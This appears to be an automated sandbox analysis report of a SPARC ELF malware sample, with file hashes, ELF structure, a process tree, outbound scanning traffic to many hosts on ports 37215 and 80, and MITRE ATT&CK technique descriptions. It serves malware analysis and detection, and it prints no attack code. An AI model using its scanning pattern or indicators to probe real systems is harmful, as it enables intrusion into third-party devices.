Entropy (8bit):	6.132548859394571
TrID:	ELF Executable and Linkable format (generic) (4004/1) 100.00%
File name:	Dy4UCGJRnG
File size:	82952
MD5:	32167ecd41fd0a0a2cf1cf9db65b9e0e
SHA1:	b18653a994bfc98fbc6df17684cca4ac85a8cda3
SHA256:	404afa3c5ce562b339afd7e02b561168ec15a4baccdca22deb34024e969b6ef2
SHA512:	63855f2b99f9e9eaf1a1a9c2836788453bd5b93fc87eb1c35c6aab69c3fa9d6bc5d2d10bb9df5e3e53b8647a9b25b12ec4c4b983088eea78b882d4902550ea03
SSDEEP:	1536:VhT/5UtCT3Ev/UzSEAMT0PY3TlXNFKFGUDuT+h:vOcGNolRUDum
File Content Preview:	.ELF...........................4..Bx.....4. ...(......................<h..<h..............@...@...@....8...X........dt.Q................................@..(....@.I.................#.....b8..`.....!..... ...@.....".........`......$ ... ...@...........`....

Static ELF Info

ELF header
Class:	ELF32
Data:	2's complement, big endian
Version:	1 (current)
Machine:	Sparc
Version Number:	0x1
Type:	EXEC (Executable file)
OS/ABI:	UNIX - System V
ABI Version:	0
Entry Point Address:	0x101a4
Flags:	0x0
ELF Header Size:	52
Program Header Offset:	52
Program Header Size:	32
Number of Program Headers:	3
Section Header Offset:	82552
Section Header Size:	40
Number of Section Headers:	10
Header String Table Index:	9

Sections

Name	Type	Address	Offset	Size	EntSize	Flags	Flags Description	Align
	NULL	0x0	0x0	0x0	0x0	0x0		0
.init	PROGBITS	0x10094	0x94	0x1c	0x0	0x6	AX	4
.text	PROGBITS	0x100b0	0xb0	0x12744	0x0	0x6	AX	4
.fini	PROGBITS	0x227f4	0x127f4	0x14	0x0	0x6	AX	4
.rodata	PROGBITS	0x22808	0x12808	0x1460	0x0	0x2	A	8
.ctors	PROGBITS	0x34000	0x14000	0x8	0x0	0x3	WA	4
.dtors	PROGBITS	0x34008	0x14008	0x8	0x0	0x3	WA	4
.data	PROGBITS	0x34018	0x14018	0x220	0x0	0x3	WA	8
.bss	NOBITS	0x34238	0x14238	0x320	0x0	0x3	WA	8
.shstrtab	STRTAB	0x0	0x14238	0x3e	0x0	0x0		1

Program Segments

Type	Offset	Virtual Address	Physical Address	File Size	Memory Size	Entropy	Flags	Flags Description	Align	Section Mappings
LOAD	0x0	0x10000	0x10000	0x13c68	0x13c68	3.6697	0x5	R E	0x10000	.init .text .fini .rodata
LOAD	0x14000	0x34000	0x34000	0x238	0x558	1.6811	0x6	RW	0x10000	.ctors .dtors .data .bss
GNU_STACK	0x0	0x0	0x0	0x0	0x0	0.0000	0x6	RW	0x4

Network Behavior

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Oct 29, 2021 20:19:09.713728905 CEST	29325	37215	192.168.2.23	41.166.69.130
Oct 29, 2021 20:19:09.713843107 CEST	29325	37215	192.168.2.23	41.98.70.131
Oct 29, 2021 20:19:09.713891029 CEST	29325	37215	192.168.2.23	41.22.125.58
Oct 29, 2021 20:19:09.713954926 CEST	29325	37215	192.168.2.23	41.82.161.226
Oct 29, 2021 20:19:09.713960886 CEST	29325	37215	192.168.2.23	41.221.202.130
Oct 29, 2021 20:19:09.713999033 CEST	29325	37215	192.168.2.23	41.16.23.86
Oct 29, 2021 20:19:09.714055061 CEST	29325	37215	192.168.2.23	41.10.204.90
Oct 29, 2021 20:19:09.714096069 CEST	29325	37215	192.168.2.23	41.83.37.28
Oct 29, 2021 20:19:09.714126110 CEST	29325	37215	192.168.2.23	41.213.55.62
Oct 29, 2021 20:19:09.714184046 CEST	29325	37215	192.168.2.23	41.35.102.26
Oct 29, 2021 20:19:09.714200020 CEST	29325	37215	192.168.2.23	41.68.186.38
Oct 29, 2021 20:19:09.714243889 CEST	29325	37215	192.168.2.23	41.33.198.108
Oct 29, 2021 20:19:09.714267969 CEST	29325	37215	192.168.2.23	41.141.19.18
Oct 29, 2021 20:19:09.714307070 CEST	29325	37215	192.168.2.23	41.164.169.135
Oct 29, 2021 20:19:09.714346886 CEST	29325	37215	192.168.2.23	41.81.81.17
Oct 29, 2021 20:19:09.714382887 CEST	29325	37215	192.168.2.23	41.160.99.215
Oct 29, 2021 20:19:09.714427948 CEST	29325	37215	192.168.2.23	41.118.28.196
Oct 29, 2021 20:19:09.714476109 CEST	29325	37215	192.168.2.23	41.90.124.37
Oct 29, 2021 20:19:09.714508057 CEST	29325	37215	192.168.2.23	41.65.172.168
Oct 29, 2021 20:19:09.714575052 CEST	29325	37215	192.168.2.23	41.109.119.140
Oct 29, 2021 20:19:09.714611053 CEST	29325	37215	192.168.2.23	41.185.72.107
Oct 29, 2021 20:19:09.714653969 CEST	29325	37215	192.168.2.23	41.228.66.243
Oct 29, 2021 20:19:09.714699984 CEST	29325	37215	192.168.2.23	41.255.244.119
Oct 29, 2021 20:19:09.714725018 CEST	29325	37215	192.168.2.23	41.206.191.53
Oct 29, 2021 20:19:09.714783907 CEST	29325	37215	192.168.2.23	41.242.110.75
Oct 29, 2021 20:19:09.714829922 CEST	29325	37215	192.168.2.23	41.156.65.18
Oct 29, 2021 20:19:09.714865923 CEST	29325	37215	192.168.2.23	41.255.127.137
Oct 29, 2021 20:19:09.714920044 CEST	29325	37215	192.168.2.23	41.186.172.67
Oct 29, 2021 20:19:09.714951038 CEST	29325	37215	192.168.2.23	41.165.16.89
Oct 29, 2021 20:19:09.715028048 CEST	29325	37215	192.168.2.23	41.246.124.159
Oct 29, 2021 20:19:09.715120077 CEST	29325	37215	192.168.2.23	41.3.69.230
Oct 29, 2021 20:19:09.715146065 CEST	29325	37215	192.168.2.23	41.132.56.252
Oct 29, 2021 20:19:09.715188026 CEST	29325	37215	192.168.2.23	41.95.245.153
Oct 29, 2021 20:19:09.715220928 CEST	29325	37215	192.168.2.23	41.186.203.76
Oct 29, 2021 20:19:09.715290070 CEST	29325	37215	192.168.2.23	41.126.172.11
Oct 29, 2021 20:19:09.715320110 CEST	29325	37215	192.168.2.23	41.117.169.161
Oct 29, 2021 20:19:09.715380907 CEST	29325	37215	192.168.2.23	41.124.67.134
Oct 29, 2021 20:19:09.715420008 CEST	29325	37215	192.168.2.23	41.241.127.254
Oct 29, 2021 20:19:09.715487003 CEST	29325	37215	192.168.2.23	41.109.183.47
Oct 29, 2021 20:19:09.715527058 CEST	29325	37215	192.168.2.23	41.182.254.248
Oct 29, 2021 20:19:09.715559959 CEST	29325	37215	192.168.2.23	41.124.118.201
Oct 29, 2021 20:19:09.715595007 CEST	29325	37215	192.168.2.23	41.183.99.235
Oct 29, 2021 20:19:09.715667009 CEST	29325	37215	192.168.2.23	41.91.178.212
Oct 29, 2021 20:19:09.715707064 CEST	29325	37215	192.168.2.23	41.64.173.88
Oct 29, 2021 20:19:09.715749979 CEST	29325	37215	192.168.2.23	41.34.45.97
Oct 29, 2021 20:19:09.715783119 CEST	29325	37215	192.168.2.23	41.170.93.159
Oct 29, 2021 20:19:09.715817928 CEST	29325	37215	192.168.2.23	41.225.123.154
Oct 29, 2021 20:19:09.715859890 CEST	29325	37215	192.168.2.23	41.161.174.96
Oct 29, 2021 20:19:09.715903997 CEST	29325	37215	192.168.2.23	41.170.80.220
Oct 29, 2021 20:19:09.715933084 CEST	29325	37215	192.168.2.23	41.196.79.91
Oct 29, 2021 20:19:09.715970993 CEST	29325	37215	192.168.2.23	41.34.198.136
Oct 29, 2021 20:19:09.716006994 CEST	29325	37215	192.168.2.23	41.2.75.14
Oct 29, 2021 20:19:09.717988014 CEST	29327	80	192.168.2.23	112.111.167.51
Oct 29, 2021 20:19:09.718111992 CEST	29327	80	192.168.2.23	112.252.36.149
Oct 29, 2021 20:19:09.718141079 CEST	29327	80	192.168.2.23	112.197.174.50
Oct 29, 2021 20:19:09.718172073 CEST	29327	80	192.168.2.23	112.27.58.48
Oct 29, 2021 20:19:09.718278885 CEST	29327	80	192.168.2.23	112.223.97.134
Oct 29, 2021 20:19:09.718317032 CEST	29327	80	192.168.2.23	112.103.145.146
Oct 29, 2021 20:19:09.718349934 CEST	29327	80	192.168.2.23	112.162.217.215
Oct 29, 2021 20:19:09.718388081 CEST	29327	80	192.168.2.23	112.157.22.5
Oct 29, 2021 20:19:09.718437910 CEST	29327	80	192.168.2.23	112.176.108.44
Oct 29, 2021 20:19:09.718527079 CEST	29327	80	192.168.2.23	112.106.213.3
Oct 29, 2021 20:19:09.718575954 CEST	29327	80	192.168.2.23	112.108.214.238
Oct 29, 2021 20:19:09.718637943 CEST	29327	80	192.168.2.23	112.112.8.206
Oct 29, 2021 20:19:09.718683958 CEST	29327	80	192.168.2.23	112.221.251.22
Oct 29, 2021 20:19:09.718719006 CEST	29327	80	192.168.2.23	112.133.74.246
Oct 29, 2021 20:19:09.718772888 CEST	29327	80	192.168.2.23	112.81.98.181
Oct 29, 2021 20:19:09.718801975 CEST	29327	80	192.168.2.23	112.225.189.37
Oct 29, 2021 20:19:09.718836069 CEST	29327	80	192.168.2.23	112.153.251.28
Oct 29, 2021 20:19:09.718871117 CEST	29327	80	192.168.2.23	112.126.165.143
Oct 29, 2021 20:19:09.718950033 CEST	29327	80	192.168.2.23	112.238.25.221
Oct 29, 2021 20:19:09.718975067 CEST	29327	80	192.168.2.23	112.202.63.79
Oct 29, 2021 20:19:09.719048023 CEST	29327	80	192.168.2.23	112.3.146.16
Oct 29, 2021 20:19:09.719084978 CEST	29327	80	192.168.2.23	112.90.143.232
Oct 29, 2021 20:19:09.719122887 CEST	29327	80	192.168.2.23	112.192.195.251
Oct 29, 2021 20:19:09.719207048 CEST	29327	80	192.168.2.23	112.245.46.140
Oct 29, 2021 20:19:09.719243050 CEST	29327	80	192.168.2.23	112.167.65.41
Oct 29, 2021 20:19:09.719304085 CEST	29327	80	192.168.2.23	112.71.38.124
Oct 29, 2021 20:19:09.719379902 CEST	29327	80	192.168.2.23	112.245.83.86
Oct 29, 2021 20:19:09.719410896 CEST	29327	80	192.168.2.23	112.48.58.191
Oct 29, 2021 20:19:09.719440937 CEST	29327	80	192.168.2.23	112.231.52.68
Oct 29, 2021 20:19:09.719480991 CEST	29327	80	192.168.2.23	112.243.134.167
Oct 29, 2021 20:19:09.719521046 CEST	29327	80	192.168.2.23	112.184.151.221
Oct 29, 2021 20:19:09.719566107 CEST	29327	80	192.168.2.23	112.184.209.19
Oct 29, 2021 20:19:09.719599009 CEST	29327	80	192.168.2.23	112.133.67.143
Oct 29, 2021 20:19:09.719660997 CEST	29327	80	192.168.2.23	112.187.130.13
Oct 29, 2021 20:19:09.719712973 CEST	29327	80	192.168.2.23	112.183.212.56
Oct 29, 2021 20:19:09.719811916 CEST	29327	80	192.168.2.23	112.213.5.148
Oct 29, 2021 20:19:09.719836950 CEST	29327	80	192.168.2.23	112.235.234.158
Oct 29, 2021 20:19:09.719887018 CEST	29327	80	192.168.2.23	112.82.156.150
Oct 29, 2021 20:19:09.719913006 CEST	29327	80	192.168.2.23	112.146.152.16
Oct 29, 2021 20:19:09.719948053 CEST	29327	80	192.168.2.23	112.36.100.9
Oct 29, 2021 20:19:09.719991922 CEST	29327	80	192.168.2.23	112.165.154.20
Oct 29, 2021 20:19:09.720057964 CEST	29327	80	192.168.2.23	112.146.27.168
Oct 29, 2021 20:19:09.720098972 CEST	29327	80	192.168.2.23	112.16.227.158
Oct 29, 2021 20:19:09.720191002 CEST	29327	80	192.168.2.23	112.236.13.148
Oct 29, 2021 20:19:09.720252991 CEST	29327	80	192.168.2.23	112.40.49.118
Oct 29, 2021 20:19:09.720293999 CEST	29327	80	192.168.2.23	112.68.165.170
Oct 29, 2021 20:19:09.720393896 CEST	29327	80	192.168.2.23	112.244.137.126
Oct 29, 2021 20:19:09.720448971 CEST	29327	80	192.168.2.23	112.38.224.76

HTTP Request Dependency Graph

192.168.0.14:80

System Behavior

Analysis Process: Dy4UCGJRnG PID: 5239 Parent PID: 5117

General

Start time:	20:19:08
Start date:	29/10/2021
Path:	/tmp/Dy4UCGJRnG
Arguments:	/tmp/Dy4UCGJRnG
File size:	4379400 bytes
MD5 hash:	7dc1c0e23cd5e102bb12e5c29403410e

Analysis Process: Dy4UCGJRnG PID: 5241 Parent PID: 5239

General

Start time:	20:19:08
Start date:	29/10/2021
Path:	/tmp/Dy4UCGJRnG
Arguments:	n/a
File size:	4379400 bytes
MD5 hash:	7dc1c0e23cd5e102bb12e5c29403410e

Analysis Process: Dy4UCGJRnG PID: 5242 Parent PID: 5239

General

Start time:	20:19:08
Start date:	29/10/2021
Path:	/tmp/Dy4UCGJRnG
Arguments:	n/a
File size:	4379400 bytes
MD5 hash:	7dc1c0e23cd5e102bb12e5c29403410e

Analysis Process: Dy4UCGJRnG PID: 5244 Parent PID: 5242

General

Start time:	20:19:08
Start date:	29/10/2021
Path:	/tmp/Dy4UCGJRnG
Arguments:	n/a
File size:	4379400 bytes
MD5 hash:	7dc1c0e23cd5e102bb12e5c29403410e

Analysis Process: Dy4UCGJRnG PID: 5246 Parent PID: 5242

General

Start time:	20:19:08
Start date:	29/10/2021
Path:	/tmp/Dy4UCGJRnG
Arguments:	n/a
File size:	4379400 bytes
MD5 hash:	7dc1c0e23cd5e102bb12e5c29403410e

Analysis Process: Dy4UCGJRnG PID: 5247 Parent PID: 5242

General

Start time:	20:19:08
Start date:	29/10/2021
Path:	/tmp/Dy4UCGJRnG
Arguments:	n/a
File size:	4379400 bytes
MD5 hash:	7dc1c0e23cd5e102bb12e5c29403410e

Analysis Process: Dy4UCGJRnG PID: 5248 Parent PID: 5242

General

Start time:	20:19:08
Start date:	29/10/2021
Path:	/tmp/Dy4UCGJRnG
Arguments:	n/a
File size:	4379400 bytes
MD5 hash:	7dc1c0e23cd5e102bb12e5c29403410e

Analysis Process: Dy4UCGJRnG PID: 5252 Parent PID: 5242

General

Start time:	20:19:08
Start date:	29/10/2021
Path:	/tmp/Dy4UCGJRnG
Arguments:	n/a
File size:	4379400 bytes
MD5 hash:	7dc1c0e23cd5e102bb12e5c29403410e

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, File monitoring, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, Azure AD, GCP, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Malware reverse engineering, Netflow/Enclave netflow, Packet capture, Process monitoring, Process use of network, SSL/TLS inspection
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using a protocol and port paring that are typically not associated. For example, HTTPS over port 8088or port 587as opposed to the traditional port 443. Adversaries may make changes to the standard port used by a protocol to bypass filtering or muddle analysis/parsing of network data.
Tactics:	Command and Control
Data Sources:	Netflow/Enclave netflow, Packet capture, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use a non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Host network interface, Netflow/Enclave netflow, Network intrusion detection system, Network protocol analysis, Packet capture, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	DNS records, Netflow/Enclave netflow, Network protocol analysis, Packet capture, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Files may be copied from an external adversary controlled system through the command and control channel to bring tools into the victim network or through alternate protocols with another tool such as FTP. Files can also be copied over on Mac and Linux with native tools like scp, rsync, and sftp.
Tactics:	Command and Control
Data Sources:	File monitoring, Netflow/Enclave netflow, Network protocol analysis, Packet capture, Process command-line parameters, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading ...

Warning!

Linux Analysis Report Dy4UCGJRnG

Overview

General Information

Detection

Signatures

Classification

Analysis Advice

General Information

Process Tree

Yara Overview

Initial Sample

PCAP (Network Traffic)

Memory Dumps

Jbx Signature Overview

AV Detection:

Networking:

System Summary:

Hooking and other Techniques for Hiding and Protection:

Malware Analysis System Evasion:

Stealing of Sensitive Information:

Remote Access Functionality:

Mitre Att&ck Matrix

Malware Configuration

Behavior Graph

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

Contacted IPs

Public

Runtime Messages

Joe Sandbox View / Context

IPs

Domains

ASN

JA3 Fingerprints

Dropped Files

Created / dropped Files

Static File Info

General

Static ELF Info

ELF header

Sections

Program Segments

Network Behavior

Network Port Distribution

TCP Packets

HTTP Request Dependency Graph

System Behavior

Analysis Process: Dy4UCGJRnG PID: 5239 Parent PID: 5117

General

Analysis Process: Dy4UCGJRnG PID: 5241 Parent PID: 5239

General

Analysis Process: Dy4UCGJRnG PID: 5242 Parent PID: 5239

General

Analysis Process: Dy4UCGJRnG PID: 5244 Parent PID: 5242

General

Analysis Process: Dy4UCGJRnG PID: 5246 Parent PID: 5242

General

Analysis Process: Dy4UCGJRnG PID: 5247 Parent PID: 5242

General

Analysis Process: Dy4UCGJRnG PID: 5248 Parent PID: 5242

General

Analysis Process: Dy4UCGJRnG PID: 5252 Parent PID: 5242

General